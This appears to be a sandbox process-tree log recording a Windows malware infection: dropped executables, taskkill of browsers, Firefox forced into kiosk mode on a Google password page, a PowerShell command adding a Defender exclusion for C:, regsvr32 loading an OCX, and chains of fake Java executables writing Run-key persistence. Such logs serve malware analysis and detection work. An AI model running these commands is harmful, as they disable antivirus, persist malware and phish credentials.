C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:38⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2200,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:28⤵PID:1008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1784,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:88⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:18⤵
- Uses browser remote debugging
PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:18⤵
- Uses browser remote debugging
PID:2156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367970101\223af68ec4.exe"C:\Users\Admin\AppData\Local\Temp\10367970101\223af68ec4.exe"6⤵PID:2516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
PID:5824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
PID:4704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:4452
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
PID:5784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:3800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3908
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:5432
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {13c6aa80-cac2-4812-b1af-f48dd7a76ff2} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:2160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {dac790be-94d6-4522-b2cc-0a8fde17444c} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:5764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3628 -prefsLen 25213 -prefMapHandle 3632 -prefMapSize 270279 -jsInitHandle 3636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {a331c2e8-b438-4df9-9d3d-6d2ba26cd378} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:3908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4080 -prefsLen 27325 -prefMapHandle 4084 -prefMapSize 270279 -ipcHandle 4172 -initialChannelId {e67dfa48-ecee-4eee-81fe-1e70a124b4e8} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:6016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3116 -prefsLen 34824 -prefMapHandle 3120 -prefMapSize 270279 -jsInitHandle 1380 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1660 -initialChannelId {c2da3d62-a1cd-433a-ab6d-cf78fffa4232} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:6300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5040 -prefsLen 34959 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 2520 -initialChannelId {5c4175a2-b3aa-4a26-b090-8080309b85fc} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:7804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2980 -prefsLen 32900 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 5072 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5084 -initialChannelId {365db42f-d267-4362-bb20-9d5eb6911aaf} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:7852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5100 -prefsLen 32900 -prefMapHandle 5104 -prefMapSize 270279 -jsInitHandle 5108 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5116 -initialChannelId {7762d5ec-7f85-4b65-9270-ba3bcb094d41} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:7864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5516 -initialChannelId {288036bf-7f26-44fc-a010-10dcec185dda} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:7900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367980101\2472d5ad66.exe"C:\Users\Admin\AppData\Local\Temp\10367980101\2472d5ad66.exe"6⤵PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"6⤵PID:7280
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"7⤵PID:7004
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"6⤵PID:8076
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"7⤵PID:19112
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368010101\3065a77778.exe"C:\Users\Admin\AppData\Local\Temp\10368010101\3065a77778.exe"6⤵PID:24428
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:19316
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368020101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10368020101\TbV75ZR.exe"6⤵PID:24876
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:24920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24920 -s 4968⤵
- Program crash
PID:25352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368030101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10368030101\u75a1_003.exe"6⤵PID:3856
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:25852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:25264
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:25860
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵PID:12348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵PID:10884
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:27128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368040101\d75dbfaf10.exe"C:\Users\Admin\AppData\Local\Temp\10368040101\d75dbfaf10.exe"6⤵PID:19684
-
-
C:\Users\Admin\AppData\Local\Temp\10368050101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10368050101\7IIl2eE.exe"6⤵PID:16808
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:26876
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368060101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10368060101\Rm3cVPI.exe"6⤵PID:7664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10368081121\2GF9eeb.cmd"6⤵PID:23560
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10368081121\2GF9eeb.cmd"7⤵PID:23716
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"6⤵PID:4172
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:26312
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368100101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10368100101\hYjiwV0.exe"6⤵PID:18312
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:24256
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368110101\d950b77f9b.exe"C:\Users\Admin\AppData\Local\Temp\10368110101\d950b77f9b.exe"6⤵PID:19344
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4320
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1748
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:2648
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:5896
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe"1⤵PID:3144
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe2⤵PID:6244
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe3⤵PID:7284
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe4⤵PID:7224
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe5⤵PID:7432
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe6⤵PID:7588
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe7⤵PID:2212
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe8⤵PID:7640
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe9⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe10⤵PID:116
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe11⤵PID:1588
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe12⤵PID:4936
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe13⤵PID:18644
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe14⤵PID:18752
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe15⤵PID:18812
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe16⤵PID:18876
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe17⤵PID:19036
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe18⤵PID:24540
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe19⤵PID:19132
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe20⤵PID:19340
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe21⤵PID:3232
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport.exe"22⤵
- Modifies registry key
PID:19504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe\"'"22⤵
- Command and Scripting Interpreter: PowerShell
PID:20216
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe1⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe2⤵PID:18884
-
C:\Users\Admin\AppData\Local\Temp\JY8NyBKE\f14tGmc1aTUQtaAz.exeC:\Users\Admin\AppData\Local\Temp\JY8NyBKE\f14tGmc1aTUQtaAz.exe 188843⤵PID:18916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18916 -s 6844⤵
- Program crash
PID:24892
-
-
-
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\CJZmu1lwMKZVNG3o.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\CJZmu1lwMKZVNG3o.exe 188843⤵PID:17156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17156 -s 4764⤵
- Program crash
PID:11928
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 25281⤵PID:18668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3052 -ip 30521⤵PID:18688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 18916 -ip 189161⤵PID:24804
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"1⤵PID:25164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 24920 -ip 249201⤵PID:25204
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:25564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe"1⤵PID:25348
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe2⤵PID:26044
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe3⤵PID:26332
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe4⤵PID:25604
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe5⤵PID:26068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe6⤵PID:25260
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe7⤵PID:25632
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe8⤵PID:25524
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe9⤵PID:25872
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe10⤵PID:26200
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe11⤵PID:25876
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe12⤵PID:25556
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe13⤵PID:26248
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe14⤵PID:25924
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe15⤵PID:25728
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe16⤵PID:7076
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"17⤵
- Modifies registry key
PID:26964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"17⤵
- Command and Scripting Interpreter: PowerShell
PID:17908
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:26588
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:26596
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:26148
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"1⤵PID:26948
-
C:\Windows\SysWOW64\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"2⤵PID:23840
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:17824
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:17744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"1⤵PID:16972
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe2⤵PID:11952
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe3⤵PID:23268
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe4⤵PID:21068
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe5⤵PID:21008
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe6⤵PID:23764
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe7⤵PID:24088
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe8⤵PID:19008
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe9⤵PID:23956
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe10⤵PID:20992
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe11⤵PID:19312
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe12⤵PID:24060
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe13⤵PID:23668
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe14⤵PID:23876
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe15⤵PID:22460
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe16⤵PID:19392
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe17⤵PID:22660
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe18⤵PID:4936
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe19⤵PID:24040
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe20⤵PID:20108
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe21⤵PID:19668
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe22⤵PID:19356
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe23⤵PID:19544
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe24⤵PID:20352
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe25⤵PID:20372
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe26⤵PID:26292
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe27⤵PID:24296
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe28⤵PID:24228
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe29⤵PID:18872
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe30⤵PID:20376
